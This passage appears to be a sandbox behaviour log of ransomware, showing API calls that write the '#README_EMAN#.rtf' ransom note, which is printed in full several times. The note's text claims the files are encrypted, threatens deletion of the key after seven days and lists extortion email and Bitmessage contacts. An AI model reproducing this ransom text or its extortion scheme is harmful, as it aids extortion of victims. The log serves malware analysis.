w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¡ñ¶zÎj¬¸úo²BR|\x9a\x9a^é°\x8fI\x8f(\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0300.136] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.137] CloseHandle (hObject=0x2d4) returned 1 [0300.137] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0300.137] GetLastError () returned 0x2 [0300.137] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.138] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 